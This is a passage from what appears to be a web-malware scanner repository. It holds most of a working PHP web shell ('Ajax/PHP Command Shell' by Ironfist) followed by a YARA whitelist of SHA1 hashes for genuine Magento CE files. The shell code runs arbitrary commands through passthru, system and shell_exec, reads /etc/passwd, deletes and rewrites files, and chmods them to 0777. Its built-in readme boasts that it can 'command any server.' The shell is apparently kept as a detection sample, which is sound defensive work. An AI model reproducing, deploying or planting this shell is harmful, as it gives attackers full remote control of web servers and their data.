I can't write to this directory, please choose another one."; 121 | } 122 | 123 | } 124 | elseif((ereg("changeworkdir (.*)",$cmd,$file)) || (ereg("cd (.*)",$cmd,$file))) 125 | { 126 | if(file_exists($file[1]) && is_dir($file[1])) 127 | { 128 | chdir($file[1]); 129 | $_SESSION['workdir'] = $file[1]; 130 | print "Current directory changed to ".$file[1]; 131 | } 132 | else 133 | { 134 | print "Directory not found"; 135 | } 136 | } 137 | 138 | elseif(strtolower($cmd) == "shellhelp") 139 | { 140 | print 'Ajax/PHP Command Shell 141 | © By Ironfist 142 | 143 | The shell can be used by anyone to command any server, the main purpose was 144 | to create a shell that feels as dynamic as possible, is expandable and easy 145 | to understand. 146 | 147 | If one of the command execution functions work, the shell will function fine. 148 | Try the "canirun" command to check this. 149 | 150 | Any (not custom) command is a UNIX command, like ls, cat, rm ... If you\'re 151 | not used to these commands, google a little. 152 | 153 | Custom Functions 154 | If you want to add your own custom command in the Quick Commands list, check 155 | out the code. The $function array contains \'func name\' => \'javascript function\'. 156 | Take a look at the built-in functions for examples. 157 | 158 | I know this readme isn\'t providing too much information, but hell, does this shell 159 | even require one :P 160 | 161 | - Iron 162 | '; 163 | 164 | } 165 | elseif(ereg("editfile (.*)",$cmd,$file)) 166 | { 167 | if(file_exists($file[1]) && !is_dir($file[1])) 168 | { 169 | print "

"; 176 | } 177 | else 178 | { 179 | print "File not found."; 180 | } 181 | } 182 | elseif(ereg("deletefile (.*)",$cmd,$file)) 183 | { 184 | if(is_dir($file[1])) 185 | { 186 | if(rmdir($file[1])) 187 | { 188 | print "Directory succesfully deleted."; 189 | } 190 | else 191 | { 192 | print "Couldn't delete directory!"; 193 | } 194 | } 195 | else 196 | { 197 | if(unlink($file[1])) 198 | { 199 | print "File succesfully deleted."; 200 | } 201 | else 202 | { 203 | print "Couldn't delete file!"; 204 | } 205 | } 206 | } 207 | elseif(strtolower($cmd) == "canirun") 208 | { 209 | print "If any of these functions is Enabled, the shell will function like it should.
"; 210 | if(function_exists(passthru)) 211 | { 212 | print "Passthru: Enabled
"; 213 | } 214 | else 215 | { 216 | print "Passthru: Disabled
"; 217 | } 218 | 219 | if(function_exists(exec)) 220 | { 221 | print "Exec: Enabled
"; 222 | } 223 | else 224 | { 225 | print "Exec: Disabled
"; 226 | } 227 | 228 | if(function_exists(system)) 229 | { 230 | print "System: Enabled
"; 231 | } 232 | else 233 | { 234 | print "System: Disabled
"; 235 | } 236 | if(function_exists(shell_exec)) 237 | { 238 | print "Shell_exec: Enabled
"; 239 | } 240 | else 241 | { 242 | print "Shell_exec: Disabled
"; 243 | } 244 | print "
Safe mode will prevent some stuff, maybe command execution, if you're looking for a
reason why the commands aren't executed, this is probally it.
"; 245 | if( ini_get('safe_mode') ){ 246 | print "Safe Mode: Enabled"; 247 | } 248 | else 249 | { 250 | print "Safe Mode: Disabled"; 251 | } 252 | print "

Open_basedir will block access to some files you shouldn't access.
"; 253 | if( ini_get('open_basedir') ){ 254 | print "Open_basedir: Enabled"; 255 | } 256 | else 257 | { 258 | print "Open_basedir: Disabled"; 259 | } 260 | } 261 | //About the shell 262 | elseif(ereg("listdir (.*)",$cmd,$directory)) 263 | { 264 | 265 | if(!file_exists($directory[1])) 266 | { 267 | die("Directory not found"); 268 | } 269 | //Some variables 270 | chdir($directory[1]); 271 | $i = 0; $f = 0; 272 | $dirs = ""; 273 | $filez = ""; 274 | 275 | if(!ereg("/$",$directory[1])) //Does it end with a slash? 276 | { 277 | $directory[1] .= "/"; //If not, add one 278 | } 279 | print "Listing directory: ".$directory[1]."
"; 280 | print ""; 281 | 282 | if ($handle = opendir($directory[1])) { 283 | while (false !== ($file = readdir($handle))) { 284 | if(is_dir($file)) 285 | { 286 | $dirs[$i] = $file; 287 | $i++; 288 | } 289 | else 290 | { 291 | $filez[$f] = $file; 292 | $f++; 293 | } 294 | 295 | } 296 | print "
DirectoriesFiles
"; 297 | 298 | foreach($dirs as $directory) 299 | { 300 | print "[D][W]".$directory."
"; 301 | } 302 | 303 | print "		"; 304 | 305 | foreach($filez as $file) 306 | { 307 | print "[D]".$file."
"; 308 | } 309 | 310 | print "
"; 311 | } 312 | } 313 | elseif(strtolower($cmd) == "about") 314 | { 315 | print "Ajax Command Shell by Ironfist.
Version $version"; 316 | } 317 | //Show info 318 | elseif(strtolower($cmd) == "showinfo") 319 | { 320 | if(function_exists(disk_free_space)) 321 | { 322 | $free = disk_free_space("/") / 1000000; 323 | } 324 | else 325 | { 326 | $free = "N/A"; 327 | } 328 | if(function_exists(disk_total_space)) 329 | { 330 | $total = trim(disk_total_space("/") / 1000000); 331 | } 332 | else 333 | { 334 | $total = "N/A"; 335 | } 336 | $path = realpath ("."); 337 | 338 | print "Free: $free / $total MB
Current path: $path
Uname -a Output:
"; 339 | 340 | if(function_exists(passthru)) 341 | { 342 | passthru("uname -a"); 343 | } 344 | else 345 | { 346 | print "Passthru is disabled :("; 347 | } 348 | } 349 | //Read /etc/passwd 350 | elseif(strtolower($cmd) == "etcpasswdfile") 351 | { 352 | 353 | $pw = file('/etc/passwd/'); 354 | foreach($pw as $line) 355 | { 356 | print $line; 357 | } 358 | 359 | 360 | } 361 | //Execute any other command 362 | else 363 | { 364 | 365 | if(function_exists(passthru)) 366 | { 367 | passthru($cmd); 368 | } 369 | else 370 | { 371 | if(function_exists(exec)) 372 | { 373 | exec("ls -la",$result); 374 | foreach($result as $output) 375 | { 376 | print $output."
"; 377 | } 378 | } 379 | else 380 | { 381 | if(function_exists(system)) 382 | { 383 | system($cmd); 384 | } 385 | else 386 | { 387 | if(function_exists(shell_exec)) 388 | { 389 | print shell_exec($cmd); 390 | } 391 | else 392 | { 393 | print "Sorry, none of the command functions works."; 394 | } 395 | } 396 | } 397 | } 398 | } 399 | } 400 | 401 | elseif(isset($_GET['savefile']) && !empty($_POST['filetosave']) && !empty($_POST['filecontent'])) 402 | { 403 | $file = $_POST['filetosave']; 404 | if(!is_writable($file)) 405 | { 406 | if(!chmod($file, 0777)) 407 | { 408 | die("Nope, can't chmod nor save :("); //In fact, nobody ever reads this message ^_^ 409 | } 410 | } 411 | 412 | $fh = fopen($file, 'w'); 413 | $dt = $_POST['filecontent']; 414 | fwrite($fh, $dt); 415 | fclose($fh); 416 | } 417 | else 418 | { 419 | ?> 420 | 421 | 422 | Command Shell ~ <?php print getenv("HTTP_HOST"); ?> 423 | 424 | 428 | 429 | 430 | 577 | 578 | 579 | 580 | 619 | 641 |
581 | 582 |

583 |
Quick Commands
584 | 585 |
586 | $execute) 588 | { 589 | print ' 
'; 590 | } 591 | ?> 592 | 593 |
594 | 595 | 596 |
597 |
Command history
598 |
599 |
600 |
About
601 |
602 |
603 | Ajax/PHP Command Shell
by Ironfist 604 |
605 | Version 606 | 607 |
608 |
609 | 610 |
Thanks to everyone @ 611 | SharePlaza 612 |
613 | milw0rm 614 |
615 | and special greetings to everyone in rootshell 616 |
617 | 618 | 		620 | 628 | 629 | 632 | 639 |
621 | [Execute command] 622 | [Upload file] 623 | [Change directory] 624 | [Filebrowser] 625 | [Create File] 626 | 627 |
630 | 631 |
633 |
634 |    
635 | Command:
636 |
637 |
638 |
640 |
642 | 643 | 644 | 648 |
649 |
You are not logged in, please login.
Password: 650 |
"; 651 | } 652 | ?> -------------------------------------------------------------------------------- /data/whitelists/magento1ce.yar: -------------------------------------------------------------------------------- 1 | private rule Magento1Ce : ECommerce 2 | { 3 | condition: 4 | /* Magento CE 1.1.1 */ 5 | hash.sha1(0, filesize) == "743c76e95b3849137c6b5552b568fa3c780c46f6" or // downloader/Maged/Pear.php 6 | hash.sha1(0, filesize) == "382cace9be19b080426456e4c984730c8ffbebf3" or // downloader/pearlib/php/System.php 7 | hash.sha1(0, filesize) == "7e0bab1294ba48689824a21e065d9643695e9f3c" or // downloader/pearlib/php/pearmage.php 8 | hash.sha1(0, filesize) == "f14a60868f4a51ee998e5e53de8bcffeecfaa56e" or // downloader/pearlib/php/pearcmd.php 9 | hash.sha1(0, filesize) == "174d2e99fbd72d9c11021e4650f2295fdf638083" or // downloader/pearlib/php/PEAR.php 10 | hash.sha1(0, filesize) == "f70bdefded327939aaa420b317e3bc15907cec3b" or // downloader/pearlib/php/PEAR/Registry.php 11 | hash.sha1(0, filesize) == "33c0a85ca6fa3a068656c404d9fcae90d687a399" or // downloader/pearlib/php/PEAR/Config.php 12 | hash.sha1(0, filesize) == "1c9b78e26352d32eaeb913579fb7789c2c9f567b" or // downloader/pearlib/php/PEAR/DependencyDB.php 13 | hash.sha1(0, filesize) == "f8bd96af3ec71ba5c4134d363cc50a209b9aef75" or // app/code/core/Mage/GoogleCheckout/Block/Adminhtml/Shipping/Merchant.php 14 | hash.sha1(0, filesize) == "64bb826dd3bebbc228731e7997e157678acae8a9" or // app/code/core/Mage/CatalogRule/sql/catalogrule_setup/mysql4-upgrade-0.7.1-0.7.2.php 15 | hash.sha1(0, filesize) == "4a0efdf2ad68ae8f602b53b82451171e65f82c09" or // app/code/core/Mage/Core/Model/Translate.php 16 | hash.sha1(0, filesize) == "d81f736df877f9126e4b55d1576e6f4fc932187e" or // app/code/core/Mage/Core/Model/Layout.php 17 | hash.sha1(0, filesize) == "bd99da4961c6fdd32b613a0038f6795d6810258f" or // app/code/core/Mage/Core/Model/Convert/Profile.php 18 | hash.sha1(0, filesize) == "1f3f1c184b3d1bdfe5243305320ce65a240f0485" or // app/code/core/Mage/Sitemap/Model/Mysql4/Catalog/Category.php 19 | hash.sha1(0, filesize) == "b6c0294bc06354096936ba415a973e7e7b596c1a" or // app/code/core/Mage/Sitemap/Model/Mysql4/Catalog/Product.php 20 | hash.sha1(0, filesize) == "8a1291211cbdcc17b26fd41b60a67eb0c35d25be" or // app/code/core/Mage/Directory/Model/Mysql4/Currency.php 21 | hash.sha1(0, filesize) == "fcfdc0cb032200b95bdf177c0b50041e02c49d23" or // app/code/core/Mage/Catalog/Block/Product/View/Options/Type/Select.php 22 | hash.sha1(0, filesize) == "888454d2cea4ee1e53c60eee13b0454397d39c22" or // app/code/core/Mage/Dataflow/Model/Profile.php 23 | hash.sha1(0, filesize) == "a0d304e026db4b836f3fbc71a6e77bc470f1b07c" or // app/code/core/Mage/Adminhtml/Block/System/Config/Form/Fieldset.php 24 | hash.sha1(0, filesize) == "c574ef276266161c851696615ae77b9f7a1a1b43" or // app/code/core/Mage/Adminhtml/Block/System/Config/Form/Field.php 25 | hash.sha1(0, filesize) == "aeb3f5e823029465cbb7c3edbf84180bc0889952" or // app/code/core/Mage/Adminhtml/Block/Catalog/Product/Edit/Tab/Options/Option.php 26 | hash.sha1(0, filesize) == "5e3470d274cd5b2e279ac978ded8f220772df0be" or // app/code/core/Zend/Cache/Backend/File.php 27 | hash.sha1(0, filesize) == "0ccb0666a924e7c5167256e1b0751a0427ab2098" or // lib/LinLibertineFont/LinLibertineC_Re-2.8.0.ttf 28 | hash.sha1(0, filesize) == "b50d4664c1a7789fe6826a16a4970d65e51dc3fa" or // lib/Varien/Pear.php 29 | hash.sha1(0, filesize) == "67386af90cbdb52a40ae5e458e2c7ac4688eddd2" or // lib/Varien/Data/Form/Element/Date.php 30 | hash.sha1(0, filesize) == "29012eb0dfee3e1b32ec76d433357b8c545540e7" or // lib/Varien/Data/Form/Element/Gallery.php 31 | hash.sha1(0, filesize) == "c4a0b1abe86508dde3ffaaf1731796586d3b2333" or // lib/Varien/Data/Form/Element/Editor.php 32 | hash.sha1(0, filesize) == "0367960b396fbc2db3654ecf6dac52e89788d117" or // lib/Varien/Data/Form/Element/Multiline.php 33 | hash.sha1(0, filesize) == "b40603ca11ce90532da0a853d45120e00e6de413" or // lib/Varien/Db/test.php 34 | hash.sha1(0, filesize) == "aae982ba3996eda190fa0c734f15f07253c1e51e" or // lib/Varien/Db/Tree.php 35 | hash.sha1(0, filesize) == "f9b9451b6c78160d889ecf1ba48020a6c17872b2" or // lib/Zend/View/Helper/HeadScript.php 36 | hash.sha1(0, filesize) == "7477aa9fe2d3f24e7d32a53e3588dda01ee5fe26" or // lib/Zend/Locale/Format.php 37 | hash.sha1(0, filesize) == "8b92c7a7efc45174190dcb65b07beddf9e4d7153" or // lib/Zend/Locale/Data.php 38 | hash.sha1(0, filesize) == "4ce8e354e898f9c8986dbc9326a672b3312f6c69" or // lib/Zend/Date/DateObject.php 39 | hash.sha1(0, filesize) == "7d0c4da4d1eade1f6c6633ade14121ab10c56d9f" or // lib/Zend/Cache/Backend/File.php 40 | 41 | /* Magento CE 1.1.2 */ 42 | hash.sha1(0, filesize) == "05943fb7d0b4d698f6e4369e601254efb3fb00ef" or // lib/LinLibertineFont/LinLibertine_Bd-2.8.1.ttf 43 | 44 | /* Magento CE 1.1.3 */ 45 | 46 | /* Magento CE 1.1.4 */ 47 | 48 | /* Magento CE 1.1.5 */ 49 | hash.sha1(0, filesize) == "a08c529465cbfdd88eff785e55487419a35041e5" or // downloader/Maged/Pear.php 50 | hash.sha1(0, filesize) == "7da9ee530dd22d47e4adc7f9cfe4bd5f31f8d426" or // app/code/core/Mage/GoogleCheckout/Block/Adminhtml/Shipping/Merchant.php 51 | hash.sha1(0, filesize) == "c0286fe2fd26330143cfc53b984cf543ea4284b9" or // app/code/core/Mage/CatalogRule/sql/catalogrule_setup/mysql4-upgrade-0.7.1-0.7.2.php 52 | hash.sha1(0, filesize) == "ee55c97ab67e3c220d2138dcb4b7f795ed424e57" or // app/code/core/Mage/Core/Model/Translate.php 53 | hash.sha1(0, filesize) == "56750037b5fb0beba3541a6405d46684235619ca" or // app/code/core/Mage/Core/Model/Layout.php 54 | hash.sha1(0, filesize) == "35d6542180b2d89477d2923151e755e2c438c06c" or // app/code/core/Mage/Core/Model/Convert/Profile.php 55 | hash.sha1(0, filesize) == "cf2450914ca13e60d30dacd243c9e4962785ff0b" or // app/code/core/Mage/Sitemap/Model/Mysql4/Catalog/Category.php 56 | hash.sha1(0, filesize) == "e6c2bd60400cae9b30095328ec9d378af98d8bd9" or // app/code/core/Mage/Sitemap/Model/Mysql4/Catalog/Product.php 57 | hash.sha1(0, filesize) == "450c9c35b69b5cdbfd82378247f2bd5e06c102ee" or // app/code/core/Mage/Directory/Model/Mysql4/Currency.php 58 | hash.sha1(0, filesize) == "055bc24efb7da2740bf3e50e25fa91ac193b4f4c" or // app/code/core/Mage/Catalog/Block/Product/View/Options/Type/Select.php 59 | hash.sha1(0, filesize) == "8c3922d6b86d2d783cb68775a3eb1ca91bfa6ffb" or // app/code/core/Mage/Dataflow/Model/Profile.php 60 | hash.sha1(0, filesize) == "b53329d05fefd512edc86f9a11c50e1f10b7543f" or // app/code/core/Mage/Adminhtml/Block/System/Config/Form/Fieldset.php 61 | hash.sha1(0, filesize) == "f87abb261a2dcc9b163314e47939fb89859574d1" or // app/code/core/Mage/Adminhtml/Block/System/Config/Form/Field.php 62 | hash.sha1(0, filesize) == "a84f4c6b83a61dab0db37730b0f938b4e8473330" or // app/code/core/Mage/Adminhtml/Block/Catalog/Product/Edit/Tab/Options/Option.php 63 | hash.sha1(0, filesize) == "cbb147789c7072f587890b8332dad9bed063bb2d" or // lib/Varien/Data/Form/Element/Date.php 64 | hash.sha1(0, filesize) == "0159b4c43eae084bedbadc494d1298e3e181f4b0" or // lib/Varien/Data/Form/Element/Gallery.php 65 | hash.sha1(0, filesize) == "44c3494ba9233407b0a5476d6cf9dc1eabd0f28a" or // lib/Varien/Data/Form/Element/Editor.php 66 | hash.sha1(0, filesize) == "6f259b077f88ad086b64a48a6fa0d0b40bd2a899" or // lib/Varien/Data/Form/Element/Multiline.php 67 | hash.sha1(0, filesize) == "1061b92949e6c336246b5020d39be60ece155d63" or // lib/Varien/Db/Tree.php 68 | 69 | /* Magento CE 1.1.6 */ 70 | 71 | /* Magento CE 1.1.7 */ 72 | hash.sha1(0, filesize) == "df23a41ed1e7996020489270e90a4aa2aa2be89d" or // downloader/Maged/Pear.php 73 | hash.sha1(0, filesize) == "ede3de4e1f73a6d047e7086d8317e06a6bf3be50" or // app/code/core/Mage/Core/Model/Layout.php 74 | hash.sha1(0, filesize) == "9cf1ea4c8cf4bc5e0b3a73a918d87c7663472c83" or // app/code/core/Mage/Adminhtml/Block/Catalog/Product/Edit/Tab/Options/Option.php 75 | hash.sha1(0, filesize) == "d7e5697b32e415f4db5f3fcc1d329577732a71c6" or // lib/Varien/Data/Form/Element/Image.php 76 | 77 | /* Magento CE 1.1.8 */ 78 | 79 | /* Magento CE 1.2.0 */ 80 | hash.sha1(0, filesize) == "d6ebc6b2915ee40734da5ca750ed522cb85dd1a7" or // app/code/core/Mage/Core/Model/Translate.php 81 | hash.sha1(0, filesize) == "277fdd2ebdaef4ed69caf17f5c416f1fc84a236c" or // app/code/core/Mage/Core/Model/Translate/Inline.php 82 | hash.sha1(0, filesize) == "37e38312a8883e404e1e810187cb42bb4eee3fa4" or // app/code/core/Mage/Dataflow/Model/Profile.php 83 | hash.sha1(0, filesize) == "2760412ac71dc87364adc8ddd74c10913e9bd9e1" or // app/code/core/Mage/Adminhtml/Block/Catalog/Product/Edit/Tab/Options/Option.php 84 | hash.sha1(0, filesize) == "98357e8621dcd97741535e97ce2d8d9a72853985" or // lib/Zend/View/Helper/HeadScript.php 85 | hash.sha1(0, filesize) == "286cf3a6569addf0ae4caba845cd94b9c0378158" or // lib/Zend/Locale/Format.php 86 | hash.sha1(0, filesize) == "f504a4747192d5428651979295780563491c3c3b" or // lib/Zend/Locale/Data.php 87 | hash.sha1(0, filesize) == "a16d202e41bae23330e0c110d5c211bb57ec0d87" or // lib/Zend/Service/ReCaptcha/MailHide.php 88 | hash.sha1(0, filesize) == "b606b94b19adba03b88b50567f59aae56ef2f91b" or // lib/Zend/Session/Exception.php 89 | hash.sha1(0, filesize) == "c22e09c85f4be958350c7f08a2570d3c3c1d4650" or // lib/Zend/Date/DateObject.php 90 | hash.sha1(0, filesize) == "4cf814ec9721da591eb5ca2861eddb80cecc90d5" or // lib/Zend/Cache/Backend/File.php 91 | 92 | /* Magento CE 1.2.0.1 */ 93 | 94 | /* Magento CE 1.2.0.2 */ 95 | 96 | /* Magento CE 1.2.0.3 */ 97 | hash.sha1(0, filesize) == "125119cd8cb47404d310f10216749983bba7591f" or // app/code/core/Mage/GoogleCheckout/Block/Adminhtml/Shipping/Merchant.php 98 | 99 | /* Magento CE 1.2.1 */ 100 | hash.sha1(0, filesize) == "695c700689f7cfdb21ac04a91bed0d39088a381b" or // app/code/core/Mage/Core/Model/Translate.php 101 | 102 | /* Magento CE 1.2.1.1 */ 103 | 104 | /* Magento CE 1.2.1.2 */ 105 | 106 | /* Magento CE 1.3.0 */ 107 | hash.sha1(0, filesize) == "f4e7a4fd12b9975e64ee9e11791cce63c30aedf7" or // app/code/core/Mage/Core/Model/Translate.php 108 | hash.sha1(0, filesize) == "ffdc0c6eb436576f8b68fe40279301ce133b562c" or // app/code/core/Mage/Core/Model/Layout.php 109 | hash.sha1(0, filesize) == "5fea618cc39851ff46dea7f25e29fb3b3e0498cf" or // app/code/core/Mage/Sitemap/Model/Mysql4/Catalog/Product.php 110 | hash.sha1(0, filesize) == "62bff1028824ec8ac0b46cbf492a5fbebe400b08" or // app/code/core/Mage/Adminhtml/Block/Catalog/Product/Edit/Tab/Options/Option.php 111 | 112 | /* Magento CE 1.3.1 */ 113 | hash.sha1(0, filesize) == "b3c2e7755a0d2b5c75f918397a5ed7f6feea5577" or // lib/PEAR/SOAP/Transport.php 114 | hash.sha1(0, filesize) == "4b66586bfa75b202e9227ac784a8ff9629005201" or // lib/PEAR/SOAP/Transport/HTTP.php 115 | 116 | /* Magento CE 1.3.1.1 */ 117 | 118 | /* Magento CE 1.3.2 */ 119 | hash.sha1(0, filesize) == "d7d4f3d1931ee90f7d820d1a754dbeb5e969adc0" or // downloader/pearlib/php/System.php 120 | hash.sha1(0, filesize) == "7fc1f9a57e67ceb0c1208e15374ce3799bfeccf2" or // app/code/core/Mage/Core/Model/Translate.php 121 | hash.sha1(0, filesize) == "c3d1caf978ce50359052d09e1d017814bab8bce2" or // app/code/core/Mage/Core/Model/Layout.php 122 | hash.sha1(0, filesize) == "893280bc8bcf75b65e2a59b60df8afcabfb7e4e5" or // app/code/core/Mage/Adminhtml/Block/Catalog/Product/Edit/Tab/Options/Option.php 123 | hash.sha1(0, filesize) == "c09844900dade96dea89ce6a8b2a7454c3a5c331" or // app/code/core/Zend/Cache/Backend/File.php 124 | hash.sha1(0, filesize) == "94e01fee6209e3bbd9034af7c83a630d6cc1e664" or // lib/Varien/Autoload.php 125 | 126 | /* Magento CE 1.3.2.1 */ 127 | 128 | /* Magento CE 1.3.2.2 */ 129 | hash.sha1(0, filesize) == "082fd7a80bef30aca4e8d8ae4b1a9f9f6ae78dab" or // app/code/core/Mage/Sitemap/Model/Mysql4/Catalog/Category.php 130 | hash.sha1(0, filesize) == "7d83812c0d978f2b4a4703e211476b855f20b5e9" or // app/code/core/Mage/Sitemap/Model/Mysql4/Catalog/Product.php 131 | hash.sha1(0, filesize) == "958de36312c048d2c00aa78c5ea46a8ef48b3a32" or // app/code/core/Mage/Directory/Model/Mysql4/Currency.php 132 | hash.sha1(0, filesize) == "7395a693295b54c4299f3393a479302b57a0d31a" or // app/code/core/Mage/Adminhtml/Block/System/Config/Form/Fieldset.php 133 | hash.sha1(0, filesize) == "d9bf44dbad9dafa0ea5976628eec3c15bf82b16d" or // lib/Varien/Autoload.php 134 | 135 | /* Magento CE 1.3.2.3 */ 136 | 137 | /* Magento CE 1.3.2.4 */ 138 | 139 | /* Magento CE 1.3.3.0 */ 140 | 141 | /* Magento CE 1.4.0.0 */ 142 | hash.sha1(0, filesize) == "7f2002909dd18f949f4ce314e4eb88cfd7cfe995" or // app/code/core/Mage/GoogleCheckout/Block/Adminhtml/Shipping/Merchant.php 143 | hash.sha1(0, filesize) == "2addd217a3550aee35337810ed0e1827cfe0b759" or // app/code/core/Mage/CatalogRule/sql/catalogrule_setup/mysql4-upgrade-0.7.1-0.7.2.php 144 | hash.sha1(0, filesize) == "b1a0974f819869bf60687f8138037c1533c005d4" or // app/code/core/Mage/Core/Model/Translate.php 145 | hash.sha1(0, filesize) == "e7b2cbeb82280d159a14f56004a9bd57a27c69b5" or // app/code/core/Mage/Core/Model/Layout.php 146 | hash.sha1(0, filesize) == "74f315376c667e8663667b43ae01d5f4438a1cae" or // app/code/core/Mage/Core/Model/Convert/Profile.php 147 | hash.sha1(0, filesize) == "55070101ed51ba9b710a133d443bf06690cc0a3a" or // app/code/core/Mage/Core/Model/Translate/Inline.php 148 | hash.sha1(0, filesize) == "e47990d40d3dc59cb50fbb8880a8cf7d4f78a291" or // app/code/core/Mage/Sitemap/Model/Mysql4/Catalog/Category.php 149 | hash.sha1(0, filesize) == "6108e7ed98fed4f1056be8cecc85b3199be13a4d" or // app/code/core/Mage/Sitemap/Model/Mysql4/Catalog/Product.php 150 | hash.sha1(0, filesize) == "75418233be7d2e5641ccd436b71d9fe7421c10bd" or // app/code/core/Mage/Directory/Model/Mysql4/Currency.php 151 | hash.sha1(0, filesize) == "0ee9b3a1a41e2d000dbfea245fc048b0996ff1f5" or // app/code/core/Mage/Catalog/Block/Product/View/Options/Type/Select.php 152 | hash.sha1(0, filesize) == "5671193e8b5f0d6099382476b110a199cbd648d9" or // app/code/core/Mage/Dataflow/Model/Profile.php 153 | hash.sha1(0, filesize) == "8c4b2e07d3f643e9a371772a7cf7b0ead9462270" or // app/code/core/Mage/Adminhtml/Model/Url.php 154 | hash.sha1(0, filesize) == "95d8cc1b6a755466ed30d4a306a36d75ef1874f1" or // app/code/core/Mage/Adminhtml/Block/System/Config/Form/Fieldset.php 155 | hash.sha1(0, filesize) == "930af3e546e73fdd7ac82d53a8ccf618ce13316b" or // app/code/core/Mage/Adminhtml/Block/System/Config/Form/Field.php 156 | hash.sha1(0, filesize) == "40cf1134b4ff2088bab26b0d29902f4efe875456" or // app/code/core/Mage/Adminhtml/Block/Customer/Edit/Renderer/Region.php 157 | hash.sha1(0, filesize) == "a9fbc4360285f686040a1fb42e19ae121ef37e1b" or // app/code/core/Mage/Adminhtml/Block/Catalog/Product/Edit/Tab/Options/Option.php 158 | hash.sha1(0, filesize) == "cefa8a549ad1ddc4cac45725b83f7a7517041203" or // app/design/frontend/default/iphone/template/customer/widget/dob.phtml 159 | hash.sha1(0, filesize) == "f890c4755c69dd318efde4620962b5edd816bc9e" or // app/design/frontend/base/default/template/customer/widget/dob.phtml 160 | hash.sha1(0, filesize) == "3df4377b9682ef76344b5eacdc43acf6a6484e7a" or // lib/Varien/Autoload.php 161 | hash.sha1(0, filesize) == "aebbeca270ebba508ac3a9e1c178a359006e8dad" or // lib/Varien/Data/Form/Element/Gallery.php 162 | hash.sha1(0, filesize) == "16615eee0a74cde38b34767a777ce10dbe0dd7c9" or // lib/Varien/Data/Form/Element/Editor.php 163 | hash.sha1(0, filesize) == "7832f3a823fe08c5494f5c42a964f49790fb86f2" or // lib/Varien/Data/Form/Element/Image.php 164 | hash.sha1(0, filesize) == "c0c772d84c95e4737c4ac4849be4129e3e17447f" or // lib/Varien/File/Uploader.php 165 | hash.sha1(0, filesize) == "b8734fb02aa55fb19bacc16e848b88681b29f493" or // lib/Zend/View/Helper/HeadScript.php 166 | hash.sha1(0, filesize) == "8a7d49626f09ce662f3a4b2d7c5c2b63e3a0b849" or // lib/Zend/Locale/Format.php 167 | hash.sha1(0, filesize) == "c3363ec292bb5cb07ad938853030c127d2b6ef97" or // lib/Zend/Locale/Data.php 168 | hash.sha1(0, filesize) == "b5499e5b6ce9bf40b7428cb5d8ba75af73cf36f1" or // lib/Zend/Soap/Client.php 169 | hash.sha1(0, filesize) == "063158d99db2cff6927ddb42d3b342c383f086bd" or // lib/Zend/Service/ReCaptcha/MailHide.php 170 | hash.sha1(0, filesize) == "d97634b7981e003503949f09fa5296658bf29bf4" or // lib/Zend/Amf/Server.php 171 | hash.sha1(0, filesize) == "ba5c8b927ccdfff1139ee6274d5cf6c9954bd706" or // lib/Zend/Session/Exception.php 172 | hash.sha1(0, filesize) == "b3904d9bd5b510249b6607c13adec6aff159b3a4" or // lib/Zend/Date/DateObject.php 173 | 174 | /* Magento CE 1.4.0.1 */ 175 | 176 | /* Magento CE 1.4.1.0 */ 177 | hash.sha1(0, filesize) == "c26d82fca7498e54640b615fabef8c4d45c6655d" or // app/code/core/Mage/GoogleCheckout/Block/Adminhtml/Shipping/Merchant.php 178 | hash.sha1(0, filesize) == "72863ffa4faa9bb2dd735611afe1310c58aff7f4" or // app/code/core/Mage/CatalogRule/sql/catalogrule_setup/mysql4-upgrade-0.7.1-0.7.2.php 179 | hash.sha1(0, filesize) == "21ba19ce0f50a4084301e8689f2f7cda2f971204" or // app/code/core/Mage/Core/Model/Translate.php 180 | hash.sha1(0, filesize) == "fcd994fe6f9c177e32d64f2dbc11344306da73d8" or // app/code/core/Mage/Core/Model/Layout.php 181 | hash.sha1(0, filesize) == "2164a2692f6a7d4a0fe1589b9e2822f3b51a0363" or // app/code/core/Mage/Core/Model/Convert/Profile.php 182 | hash.sha1(0, filesize) == "b8435034f33e6261ae700052bf6fa9d8b0f821bd" or // app/code/core/Mage/Core/Model/Translate/Inline.php 183 | hash.sha1(0, filesize) == "a59a390c12706e4aa74e1f91868c8773cfbbbd81" or // app/code/core/Mage/Sitemap/Model/Mysql4/Catalog/Category.php 184 | hash.sha1(0, filesize) == "640c7e18fc10ccb14b9b0fd2ff336f3894928cfb" or // app/code/core/Mage/Sitemap/Model/Mysql4/Catalog/Product.php 185 | hash.sha1(0, filesize) == "91460799f6a9c6385e9878fd0a79624b8112d079" or // app/code/core/Mage/Directory/Model/Mysql4/Currency.php 186 | hash.sha1(0, filesize) == "a61f87f2c29575ca5d31933daa9bb4e0c35cc7c5" or // app/code/core/Mage/Catalog/Block/Product/View/Options/Type/Select.php 187 | hash.sha1(0, filesize) == "ec5cfd2435a4fb385d5fb3f43249618091d4b1f2" or // app/code/core/Mage/Dataflow/Model/Profile.php 188 | hash.sha1(0, filesize) == "34c3ae9b10cc1e3dcd346406daad972de2a9f53a" or // app/code/core/Mage/Adminhtml/Block/System/Config/Form/Fieldset.php 189 | hash.sha1(0, filesize) == "f1d50bfd4dc8cf023bb2467928ee07b8ca277f1f" or // app/code/core/Mage/Adminhtml/Block/System/Config/Form/Field.php 190 | hash.sha1(0, filesize) == "04e7dc316cd70f8851e27d2f1ee094003c79191d" or // app/code/core/Mage/Adminhtml/Block/Customer/Edit/Renderer/Region.php 191 | hash.sha1(0, filesize) == "75c0b78644517ab431cd2067aeb4c9b606fe5629" or // app/code/core/Mage/Adminhtml/Block/Catalog/Product/Edit/Tab/Options/Option.php 192 | hash.sha1(0, filesize) == "3bb4df77cbfd37d70c24621a0e1819059bd06a74" or // app/design/frontend/default/iphone/template/customer/widget/dob.phtml 193 | hash.sha1(0, filesize) == "2a78243468ee200ee3933d03fc2b52f375516b24" or // app/design/frontend/base/default/template/customer/widget/dob.phtml 194 | hash.sha1(0, filesize) == "3133a72daf3fe6f51778fa89e07f7c7c07de9493" or // lib/Varien/Data/Form/Element/Editor.php 195 | hash.sha1(0, filesize) == "5129a7555895007ecc2a1975fcd91cf2d0d8abe1" or // lib/Varien/File/Uploader.php 196 | hash.sha1(0, filesize) == "e4269e6d47cbb5c606e916e1fcd80c1acc131e55" or // lib/Zend/Locale/Format.php 197 | 198 | /* Magento CE 1.4.1.1 */ 199 | 200 | /* Magento CE 1.4.2.0 */ 201 | hash.sha1(0, filesize) == "47576a4be1d4f450436ceef01f4d76561b49c10f" or // app/code/community/Find/Feed/Model/Import.php 202 | hash.sha1(0, filesize) == "b5503689bc6a42a1223019adfde7680b643bba92" or // 